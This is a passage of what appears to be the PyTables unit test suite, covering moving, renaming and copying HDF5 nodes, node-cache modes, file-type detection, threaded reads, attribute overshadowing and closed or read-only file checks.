group = self.h5file.root.agroup.agroup4
self.assertEqual(group._v_title, "Group title 3")
def test09e_renameGroup(self):
"""Checking renaming a Group with nested groups in the LRU cache."""
# This checks for ticket #126.
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Load intermediate groups and keep a nested one alive.
g = self.h5file.root.agroup.agroup3.agroup4
self.assertIsNotNone(g)
self.h5file.rename_node('/', name='agroup', newname='agroup_')
# see ticket #126
self.assertNotIn('/agroup_/agroup4', self.h5file)
self.assertNotIn('/agroup', self.h5file)
for newpath in ['/agroup_', '/agroup_/agroup3',
'/agroup_/agroup3/agroup4']:
self.assertIn(newpath, self.h5file)
self.assertEqual(
newpath, self.h5file.get_node(newpath)._v_pathname)
def test10_moveLeaf(self):
"""Checking moving a leave and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.anarray, newgroup, 'anarray2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
array_ = self.h5file.root.newgroup.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/newgroup/anarray2")
self.assertEqual(array_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test10b_moveLeaf(self):
"""Checking moving a leave and access it without a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.anarray, newgroup, 'anarray2')
# Ensure that the new name exists
array_ = self.h5file.root.newgroup.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/newgroup/anarray2")
self.assertEqual(array_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test10c_moveLeaf(self):
"""Checking moving Leaves and modify attributes after that."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.anarray, newgroup, 'anarray2')
array_ = self.h5file.root.newgroup.anarray2
array_.attrs.TITLE = "hello"
# Ensure that the new attribute has been written correctly
self.assertEqual(array_.title, "hello")
self.assertEqual(array_.attrs.TITLE, "hello")
def test10d_moveToExistingLeaf(self):
"""Checking moving a leaf to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.move_node(
self.h5file.root.anarray, self.h5file.root, 'array')
def test10_2_moveTable(self):
"""Checking moving a table and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
table_ = self.h5file.root.newgroup.atable2
self.assertEqual(table_.name, "atable2")
self.assertEqual(table_._v_pathname, "/newgroup/atable2")
self.assertEqual(table_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.atable
def test10_2b_moveTable(self):
"""Checking moving a table and access it without a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
# Ensure that the new name exists
table_ = self.h5file.root.newgroup.atable2
self.assertEqual(table_.name, "atable2")
self.assertEqual(table_._v_pathname, "/newgroup/atable2")
self.assertEqual(table_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.atable
def test10_2b_bis_moveTable(self):
"""Checking moving a table and use cached row without a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
# Cache the Row attribute prior to the move
row = self.h5file.root.atable.row
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
# Ensure that the new name exists
table_ = self.h5file.root.newgroup.atable2
self.assertEqual(table_.name, "atable2")
self.assertEqual(table_._v_pathname, "/newgroup/atable2")
self.assertEqual(table_._v_depth, 2)
        # Ensure that the cached Row attribute has been updated
row = table_.row
self.assertEqual(table_._v_pathname, row.table._v_pathname)
nrows = table_.nrows
# Add a new row just to make sure that this works
row.append()
table_.flush()
self.assertEqual(table_.nrows, nrows + 1)
def test10_2c_moveTable(self):
"""Checking moving tables and modify attributes after that."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
table_ = self.h5file.root.newgroup.atable2
table_.attrs.TITLE = "hello"
# Ensure that the new attribute has been written correctly
self.assertEqual(table_.title, "hello")
self.assertEqual(table_.attrs.TITLE, "hello")
def test10_2d_moveToExistingTable(self):
"""Checking moving a table to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.move_node(self.h5file.root.atable, self.h5file.root,
'table')
def test10_2e_moveToExistingTableOverwrite(self):
"""Checking moving a table to an existing name, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcNode = self.h5file.root.atable
self.h5file.move_node(srcNode, self.h5file.root, 'table',
overwrite=True)
dstNode = self.h5file.root.table
self.assertIs(srcNode, dstNode)
def test11_moveGroup(self):
"""Checking moving a Group and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group(self.h5file.root, 'newgroup')
self.h5file.move_node(self.h5file.root.agroup, newgroup, 'agroup3')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
group = self.h5file.root.newgroup.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/newgroup/agroup3")
self.assertEqual(group._v_depth, 2)
# The children of this group must also be accessible through the
# new name path
group2 = self.h5file.get_node("/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_depth, 3)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test11b_moveGroup(self):
"""Checking moving a Group and access it immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group(self.h5file.root, 'newgroup')
self.h5file.move_node(self.h5file.root.agroup, newgroup, 'agroup3')
# Ensure that the new name exists
group = self.h5file.root.newgroup.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/newgroup/agroup3")
self.assertEqual(group._v_depth, 2)
# The children of this group must also be accessible through the
# new name path
group2 = self.h5file.get_node("/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_depth, 3)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test11c_moveGroup(self):
"""Checking moving a Group and modify attributes afterwards."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group(self.h5file.root, 'newgroup')
self.h5file.move_node(self.h5file.root.agroup, newgroup, 'agroup3')
# Ensure that we can modify attributes in the new group
group = self.h5file.root.newgroup.agroup3
group._v_attrs.TITLE = "Hello"
group._v_attrs.hola = "Hello"
self.assertEqual(group._v_title, "Hello")
self.assertEqual(group._v_attrs.TITLE, "Hello")
self.assertEqual(group._v_attrs.hola, "Hello")
def test11d_moveToExistingGroup(self):
"""Checking moving a group to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.move_node(self.h5file.root.agroup, self.h5file.root,
'agroup2')
def test11e_moveToExistingGroupOverwrite(self):
"""Checking moving a group to an existing name, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 -> agroup
srcNode = self.h5file.root.agroup2
self.h5file.move_node(srcNode, self.h5file.root, 'agroup',
overwrite=True)
dstNode = self.h5file.root.agroup
self.assertIs(srcNode, dstNode)
def test12a_moveNodeOverItself(self):
"""Checking moving a node over itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# array -> array
srcNode = self.h5file.root.array
self.h5file.move_node(srcNode, self.h5file.root, 'array')
dstNode = self.h5file.root.array
self.assertIs(srcNode, dstNode)
def test12b_moveGroupIntoItself(self):
"""Checking moving a group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup2 -> agroup2/
self.h5file.move_node(self.h5file.root.agroup2,
self.h5file.root.agroup2)
def test13a_copyLeaf(self):
"""Copying a leaf."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# array => agroup2/
new_node = self.h5file.copy_node(self.h5file.root.array,
self.h5file.root.agroup2)
dstNode = self.h5file.root.agroup2.array
self.assertIs(new_node, dstNode)
def test13b_copyGroup(self):
"""Copying a group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 => agroup/
new_node = self.h5file.copy_node(self.h5file.root.agroup2,
self.h5file.root.agroup)
dstNode = self.h5file.root.agroup.agroup2
self.assertIs(new_node, dstNode)
def test13c_copyGroupSelf(self):
"""Copying a group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 => agroup2/
new_node = self.h5file.copy_node(self.h5file.root.agroup2,
self.h5file.root.agroup2)
dstNode = self.h5file.root.agroup2.agroup2
self.assertIs(new_node, dstNode)
def test13d_copyGroupRecursive(self):
"""Recursively copying a group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup => agroup2/
new_node = self.h5file.copy_node(
self.h5file.root.agroup, self.h5file.root.agroup2, recursive=True)
dstNode = self.h5file.root.agroup2.agroup
self.assertIs(new_node, dstNode)
dstChild1 = dstNode.anarray1
self.assertIsNotNone(dstChild1)
dstChild2 = dstNode.anarray2
self.assertIsNotNone(dstChild2)
dstChild3 = dstNode.agroup3
self.assertIsNotNone(dstChild3)
def test13e_copyRootRecursive(self):
"""Recursively copying the root group into the root of another file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
# h5file.root => h5file2.root
new_node = self.h5file.copy_node(
self.h5file.root, h5file2.root, recursive=True)
dstNode = h5file2.root
self.assertIs(new_node, dstNode)
self.assertIn("/agroup", h5file2)
self.assertIn("/agroup/anarray1", h5file2)
self.assertIn("/agroup/agroup3", h5file2)
finally:
h5file2.close()
os.remove(h5fname2)
def test13f_copyRootRecursive(self):
"""Recursively copying the root group into a group in another file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
h5file2.create_group('/', 'agroup2')
# fileh.root => h5file2.root.agroup2
new_node = self.h5file.copy_node(
self.h5file.root, h5file2.root.agroup2, recursive=True)
dstNode = h5file2.root.agroup2
self.assertIs(new_node, dstNode)
self.assertIn("/agroup2/agroup", h5file2)
self.assertIn("/agroup2/agroup/anarray1", h5file2)
self.assertIn("/agroup2/agroup/agroup3", h5file2)
finally:
h5file2.close()
os.remove(h5fname2)
def test13g_copyRootItself(self):
"""Recursively copying the root group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
agroup2 = self.h5file.root
self.assertIsNotNone(agroup2)
# h5file.root => h5file.root
self.assertRaises(IOError, self.h5file.copy_node,
self.h5file.root, self.h5file.root, recursive=True)
def test14a_copyNodeExisting(self):
"""Copying over an existing node."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup2 => agroup
self.h5file.copy_node(self.h5file.root.agroup2, newname='agroup')
def test14b_copyNodeExistingOverwrite(self):
"""Copying over an existing node, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 => agroup
new_node = self.h5file.copy_node(self.h5file.root.agroup2,
newname='agroup', overwrite=True)
dstNode = self.h5file.root.agroup
self.assertIs(new_node, dstNode)
def test14b2_copyNodeExistingOverwrite(self):
"""Copying over an existing node in other file, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
# file1:/anarray1 => h5fname2:/anarray1
new_node = self.h5file.copy_node(self.h5file.root.agroup.anarray1,
newparent=h5file2.root)
# file1:/ => h5fname2:/
new_node = self.h5file.copy_node(self.h5file.root, h5file2.root,
overwrite=True, recursive=True)
dstNode = h5file2.root
self.assertIs(new_node, dstNode)
finally:
h5file2.close()
os.remove(h5fname2)
def test14c_copyNodeExistingSelf(self):
"""Copying over self."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup => agroup
self.h5file.copy_node(self.h5file.root.agroup, newname='agroup')
def test14d_copyNodeExistingOverwriteSelf(self):
"""Copying over self, trying to overwrite."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup => agroup
self.h5file.copy_node(
self.h5file.root.agroup, newname='agroup', overwrite=True)
def test14e_copyGroupSelfRecursive(self):
"""Recursively copying a group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup => agroup/
self.h5file.copy_node(self.h5file.root.agroup,
self.h5file.root.agroup, recursive=True)
def test15a_oneStepMove(self):
"""Moving and renaming a node in a single action."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# anarray1 -> agroup/array
srcNode = self.h5file.root.anarray1
self.h5file.move_node(srcNode, self.h5file.root.agroup, 'array')
dstNode = self.h5file.root.agroup.array
self.assertIs(srcNode, dstNode)
def test15b_oneStepCopy(self):
"""Copying and renaming a node in a single action."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# anarray1 => agroup/array
new_node = self.h5file.copy_node(
self.h5file.root.anarray1, self.h5file.root.agroup, 'array')
dstNode = self.h5file.root.agroup.array
self.assertIs(new_node, dstNode)
def test16a_fullCopy(self):
"""Copying full data and user attributes."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup => groupcopy
srcNode = self.h5file.root.agroup
new_node = self.h5file.copy_node(
srcNode, newname='groupcopy', recursive=True)
dstNode = self.h5file.root.groupcopy
self.assertIs(new_node, dstNode)
self.assertEqual(srcNode._v_attrs.testattr, dstNode._v_attrs.testattr)
self.assertEqual(
srcNode.anarray1.attrs.testattr, dstNode.anarray1.attrs.testattr)
self.assertEqual(srcNode.anarray1.read(), dstNode.anarray1.read())
def test16b_partialCopy(self):
"""Copying partial data and no user attributes."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup => groupcopy
srcNode = self.h5file.root.agroup
new_node = self.h5file.copy_node(
srcNode, newname='groupcopy',
recursive=True, copyuserattrs=False,
start=0, stop=5, step=2)
dstNode = self.h5file.root.groupcopy
self.assertIs(new_node, dstNode)
self.assertFalse(hasattr(dstNode._v_attrs, 'testattr'))
self.assertFalse(hasattr(dstNode.anarray1.attrs, 'testattr'))
self.assertEqual(srcNode.anarray1.read()[
0:5:2], dstNode.anarray1.read())
def test16c_fullCopy(self):
"""Copying full data and user attributes (from file to file)."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
# file1:/ => h5fname2:groupcopy
srcNode = self.h5file.root
new_node = self.h5file.copy_node(
srcNode, h5file2.root, newname='groupcopy', recursive=True)
dstNode = h5file2.root.groupcopy
self.assertIs(new_node, dstNode)
self.assertEqual(srcNode._v_attrs.testattr,
dstNode._v_attrs.testattr)
self.assertEqual(
srcNode.agroup.anarray1.attrs.testattr,
dstNode.agroup.anarray1.attrs.testattr)
self.assertEqual(srcNode.agroup.anarray1.read(),
dstNode.agroup.anarray1.read())
finally:
h5file2.close()
os.remove(h5fname2)
def test17a_CopyChunkshape(self):
"""Copying dataset with a chunkshape."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcTable = self.h5file.root.table
newTable = self.h5file.copy_node(
srcTable, newname='tablecopy', chunkshape=11)
self.assertEqual(newTable.chunkshape, (11,))
self.assertNotEqual(srcTable.chunkshape, newTable.chunkshape)
def test17b_CopyChunkshape(self):
"""Copying dataset with a chunkshape with 'keep' value."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcTable = self.h5file.root.table
newTable = self.h5file.copy_node(
srcTable, newname='tablecopy', chunkshape='keep')
self.assertEqual(srcTable.chunkshape, newTable.chunkshape)
def test17c_CopyChunkshape(self):
"""Copying dataset with a chunkshape with 'auto' value."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcTable = self.h5file.root.table
newTable = self.h5file.copy_node(
srcTable, newname='tablecopy', chunkshape=11)
newTable2 = self.h5file.copy_node(
newTable, newname='tablecopy2', chunkshape='auto')
self.assertEqual(srcTable.chunkshape, newTable2.chunkshape)
def test18_closedRepr(self):
"""Representing a closed node as a string."""
self._reopen(node_cache_slots=self.node_cache_slots)
for node in [self.h5file.root.agroup, self.h5file.root.anarray]:
node._f_close()
self.assertIn('closed', str(node))
self.assertIn('closed', repr(node))
def test19_fileno(self):
"""Checking that the 'fileno()' method works."""
# Open the old HDF5 file
self._reopen(mode="r", node_cache_slots=self.node_cache_slots)
# Get the file descriptor for this file
fd = self.h5file.fileno()
if common.verbose:
print("Value of fileno():", fd)
self.assertGreaterEqual(fd, 0)
class NodeCacheOpenFile(OpenFileTestCase):
node_cache_slots = NODE_CACHE_SLOTS
open_kwargs = dict(node_cache_slots=node_cache_slots)
class NoNodeCacheOpenFile(OpenFileTestCase):
node_cache_slots = 0
open_kwargs = dict(node_cache_slots=node_cache_slots)
class DictNodeCacheOpenFile(OpenFileTestCase):
node_cache_slots = -NODE_CACHE_SLOTS
open_kwargs = dict(node_cache_slots=node_cache_slots)
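# Added note: the three subclasses above exercise the node cache in its three documented
# modes -- a positive ``node_cache_slots`` gives a bounded LRU cache, 0 disables the
# cache, and a negative value keeps every touched node in a plain dictionary.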
class CheckFileTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(CheckFileTestCase, self).setUp()
# Create a regular (text) file
self.txtfile = tempfile.mktemp(".h5")
self.fileh = open(self.txtfile, "w")
self.fileh.write("Hello!")
self.fileh.close()
def tearDown(self):
self.fileh.close()
os.remove(self.txtfile)
super(CheckFileTestCase, self).tearDown()
def test00_isHDF5File(self):
"""Checking tables.is_hdf5_file function (TRUE case)"""
# Create a PyTables file (and by so, an HDF5 file)
self.h5file.create_array(self.h5file.root, 'array', [1, 2],
title="Title example")
# For this method to run, it needs a closed file
self.h5file.close()
        # When the file is in HDF5 format, this always returns 1
if common.verbose:
print("\nisHDF5File(%s) ==> %d" % (
self.h5fname, tables.is_hdf5_file(self.h5fname)))
self.assertEqual(tables.is_hdf5_file(self.h5fname), 1)
def test01_isHDF5File(self):
"""Checking tables.is_hdf5_file function (FALSE case)"""
version = tables.is_hdf5_file(self.txtfile)
        # When the file is not in HDF5 format, it always returns 0 or a
        # negative value
self.assertLessEqual(version, 0)
def test01x_isHDF5File_nonexistent(self):
"""Identifying a nonexistent HDF5 file."""
self.assertRaises(IOError, tables.is_hdf5_file, 'nonexistent')
@unittest.skipUnless(hasattr(os, 'getuid') and os.getuid() != 0, "no UID")
def test01x_isHDF5File_unreadable(self):
"""Identifying an unreadable HDF5 file."""
self.h5file.close()
os.chmod(self.h5fname, 0) # no permissions at all
self.assertRaises(IOError, tables.is_hdf5_file, self.h5fname)
def test02_isPyTablesFile(self):
"""Checking is_pytables_file function (TRUE case)"""
# Create a PyTables h5fname
self.h5file.create_array(self.h5file.root, 'array',
[1, 2], title="Title example")
# For this method to run, it needs a closed h5fname
self.h5file.close()
version = tables.is_pytables_file(self.h5fname)
# When h5fname has a PyTables format, always returns "1.0" string or
# greater
if common.verbose:
print()
print("\nPyTables format version number ==> %s" % version)
self.assertGreaterEqual(version, "1.0")
def test03_isPyTablesFile(self):
"""Checking is_pytables_file function (FALSE case)"""
version = tables.is_pytables_file(self.txtfile)
        # When the file is not in PyTables format, None is returned
if common.verbose:
print()
print("\nPyTables format version number ==> %s" % version)
self.assertIsNone(version)
def test04_openGenericHDF5File(self):
"""Checking opening of a generic HDF5 file."""
# Open an existing generic HDF5 file
h5fname = test_filename("ex-noattr.h5")
with tables.open_file(h5fname, mode="r") as h5file:
# Check for some objects inside
# A group
columns = h5file.get_node("/columns", classname="Group")
self.assertEqual(columns._v_name, "columns")
# An Array
array_ = h5file.get_node(columns, "TDC", classname="Array")
self.assertEqual(array_._v_name, "TDC")
# The new LRU code defers the appearance of a warning to this point
# Here comes an Array of H5T_ARRAY type
ui = h5file.get_node(columns, "pressure", classname="Array")
self.assertEqual(ui._v_name, "pressure")
if common.verbose:
print("Array object with type H5T_ARRAY -->", repr(ui))
print("Array contents -->", ui[:])
# A Table
table = h5file.get_node("/detector", "table", classname="Table")
self.assertEqual(table._v_name, "table")
def test04b_UnImplementedOnLoading(self):
"""Checking failure loading resulting in an ``UnImplemented`` node."""
############### Note for developers ###############################
# This test fails if you have the line: #
# ##return ChildClass(self, childname) # uncomment for debugging #
# uncommented in Group.py! #
###################################################################
h5fname = test_filename('smpl_unsupptype.h5')
with tables.open_file(h5fname) as h5file:
with self.assertWarns(UserWarning):
node = h5file.get_node('/CompoundChunked')
self.assertIsInstance(node, UnImplemented)
def test04c_UnImplementedScalar(self):
"""Checking opening of HDF5 files containing scalar dataset of
UnImlemented type."""
with tables.open_file(test_filename("scalar.h5")) as h5file:
with self.assertWarns(UserWarning):
node = h5file.get_node('/variable length string')
self.assertIsInstance(node, UnImplemented)
def test05_copyUnimplemented(self):
"""Checking that an UnImplemented object cannot be copied."""
# Open an existing generic HDF5 file
h5fname = test_filename("smpl_unsupptype.h5")
with tables.open_file(h5fname, mode="r") as h5file:
self.assertWarns(UserWarning, h5file.get_node, '/CompoundChunked')
with warnings.catch_warnings():
warnings.simplefilter("ignore")
ui = h5file.get_node('/CompoundChunked')
self.assertEqual(ui._v_name, 'CompoundChunked')
if common.verbose:
print("UnImplement object -->", repr(ui))
# Check that it cannot be copied to another file:
self.assertWarns(UserWarning, ui.copy, self.h5file.root, "newui")
# The next can be used to check the copy of Array objects with H5T_ARRAY
# in the future
def _test05_copyUnimplemented(self):
"""Checking that an UnImplemented object cannot be copied."""
# Open an existing generic HDF5 file
# We don't need to wrap this in a try clause because
# it has already been tried and the warning will not happen again
h5fname2 = test_filename("ex-noattr.h5")
with tables.open_file(h5fname2, mode="r") as h5file2:
# An unsupported object (the deprecated H5T_ARRAY type in
# Array, from pytables 0.8 on)
ui = h5file2.get_node(h5file2.root.columns, "pressure")
self.assertEqual(ui._v_name, "pressure")
if common.verbose:
print("UnImplement object -->", repr(ui))
# Check that it cannot be copied to another file
with warnings.catch_warnings():
# Force the userwarning to issue an error
warnings.filterwarnings("error", category=UserWarning)
with self.assertRaises(UserWarning):
ui.copy(self.h5file.root, "newui")
@unittest.skipIf((os.name == 'nt' and sys.version_info < (3,))
or tables.file._FILE_OPEN_POLICY == 'strict',
'FILE_OPEN_POLICY = "strict"')
class ThreadingTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(ThreadingTestCase, self).setUp()
self.h5file.create_carray('/', 'test_array', tables.Int64Atom(),
(200, 300))
self.h5file.close()
def test(self):
lock = threading.Lock()
        def synchronized_open_file(*args, **kwargs):
            with lock:
                return tables.open_file(*args, **kwargs)
        def synchronized_close_file(self, *args, **kwargs):
            with lock:
                return self.close(*args, **kwargs)
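        # Added note: HDF5/PyTables file opens and closes are not thread-safe, so the
        # helpers above serialize them behind a lock while each thread reads from its
        # own File handle concurrently.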
filename = self.h5fname
def run(filename, q):
try:
                f = synchronized_open_file(filename, mode='r')
arr = f.root.test_array[8:12, 18:22]
assert arr.max() == arr.min() == 0
                synchronized_close_file(f)
except Exception:
q.put(sys.exc_info())
else:
q.put('OK')
threads = []
q = queue.Queue()
for i in range(10):
t = threading.Thread(target=run, args=(filename, q))
t.start()
threads.append(t)
for i in range(10):
self.assertEqual(q.get(), 'OK')
for t in threads:
t.join()
class PythonAttrsTestCase(common.TempFileMixin, TestCase):
"""Test interactions of Python attributes and child nodes."""
def test00_attrOverChild(self):
"""Setting a Python attribute over a child node."""
root = self.h5file.root
# Create ``/test`` and overshadow it with ``root.test``.
child = self.h5file.create_array(root, 'test', [1])
attr = 'foobar'
self.assertWarns(NaturalNameWarning, setattr, root, 'test', attr)
self.assertIs(root.test, attr)
self.assertIs(root._f_get_child('test'), child)
# Now bring ``/test`` again to light.
del root.test
self.assertIs(root.test, child)
# Now there is no *attribute* named ``test``.
self.assertRaises(AttributeError,
delattr, root, 'test')
def test01_childUnderAttr(self):
"""Creating a child node under a Python attribute."""
h5file = self.h5file
root = h5file.root
# Create ``root.test`` and an overshadowed ``/test``.
attr = 'foobar'
root.test = attr
self.assertWarns(NaturalNameWarning,
h5file.create_array, root, 'test', [1])
child = h5file.get_node('/test')
self.assertIs(root.test, attr)
self.assertIs(root._f_get_child('test'), child)
# Now bring ``/test`` again to light.
del root.test
self.assertIs(root.test, child)
# Now there is no *attribute* named ``test``.
self.assertRaises(AttributeError, delattr, root, 'test')
def test02_nodeAttrInLeaf(self):
"""Assigning a ``Node`` value as an attribute to a ``Leaf``."""
h5file = self.h5file
array1 = h5file.create_array('/', 'array1', [1])
array2 = h5file.create_array('/', 'array2', [1])
# This may make the garbage collector work a little.
array1.array2 = array2
array2.array1 = array1
# Check the assignments.
self.assertIs(array1.array2, array2)
self.assertIs(array2.array1, array1)
self.assertRaises(NoSuchNodeError, # ``/array1`` is not a group
h5file.get_node, '/array1/array2')
self.assertRaises(NoSuchNodeError, # ``/array2`` is not a group
h5file.get_node, '/array2/array3')
def test03_nodeAttrInGroup(self):
"""Assigning a ``Node`` value as an attribute to a ``Group``."""
h5file = self.h5file
root = h5file.root
array = h5file.create_array('/', 'array', [1])
# Assign the array to a pair of attributes,
# one of them overshadowing the original.
root.arrayAlias = array
self.assertWarns(NaturalNameWarning, setattr, root, 'array', array)
# Check the assignments.
self.assertIs(root.arrayAlias, array)
self.assertIs(root.array, array)
self.assertRaises(NoSuchNodeError, h5file.get_node, '/arrayAlias')
self.assertIs(h5file.get_node('/array'), array)
# Remove the attribute overshadowing the child.
del root.array
# Now there is no *attribute* named ``array``.
self.assertRaises(AttributeError, delattr, root, 'array')
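# Illustrative sketch (added; mirrors what ``PythonAttrsTestCase`` asserts above): how a
# plain Python attribute can overshadow a child node of the same name. The function name
# ``_demo_overshadowing`` is hypothetical and is never called by the test suite.
def _demo_overshadowing(h5fname):
    with tables.open_file(h5fname, "w") as f:
        child = f.create_array("/", "test", [1])        # HDF5 node /test
        with warnings.catch_warnings():
            warnings.simplefilter("ignore")             # silence the NaturalNameWarning
            f.root.test = "foobar"                      # Python attribute shadows the node
        assert f.root.test == "foobar"                  # plain getattr sees the attribute
        assert f.root._f_get_child("test") is child     # the node is still reachable
        del f.root.test                                 # drop the shadowing attribute
        assert f.root.test is child                     # the node is visible again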
class StateTestCase(common.TempFileMixin, TestCase):
"""Test that ``File`` and ``Node`` operations check their state (open or
closed, readable or writable) before proceeding."""
def test00_fileCopyFileClosed(self):
"""Test copying a closed file."""
self.h5file.close()
h5cfname = tempfile.mktemp(suffix='.h5')
try:
self.assertRaises(ClosedFileError,
self.h5file.copy_file, h5cfname)
finally:
if os.path.exists(h5cfname):
os.remove(h5cfname)
def test01_fileCloseClosed(self):
"""Test closing an already closed file."""
self.h5file.close()
try:
self.h5file.close()
except ClosedFileError:
self.fail("could not close an already closed file")
def test02_fileFlushClosed(self):
"""Test flushing a closed file."""
self.h5file.close()
self.assertRaises(ClosedFileError, self.h5file.flush)
def test03_fileFlushRO(self):
"""Flushing a read-only file."""
self._reopen('r')
try:
self.h5file.flush()
except FileModeError:
self.fail("could not flush a read-only file")
def test04_fileCreateNodeClosed(self):
"""Test creating a node in a closed file."""
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.create_group, '/', 'test')
def test05_fileCreateNodeRO(self):
"""Test creating a node in a read-only file."""
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.create_group, '/', 'test')
def test06_fileRemoveNodeClosed(self):
"""Test removing a node from a closed file."""
self.h5file.create_group('/', 'test')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.remove_node, '/', 'test')
def test07_fileRemoveNodeRO(self):
"""Test removing a node from a read-only file."""
self.h5file.create_group('/', 'test')
self._reopen('r')
self.assertRaises(FileModeError,
self.h5file.remove_node, '/', 'test')
def test08_fileMoveNodeClosed(self):
"""Test moving a node in a closed file."""
self.h5file.create_group('/', 'test1')
self.h5file.create_group('/', 'test2')
self.h5file.close()
self.assertRaises(ClosedFileError,
self.h5file.move_node, '/test1', '/', 'test2')
def test09_fileMoveNodeRO(self):
"""Test moving a node in a read-only file."""
self.h5file.create_group('/', 'test1')
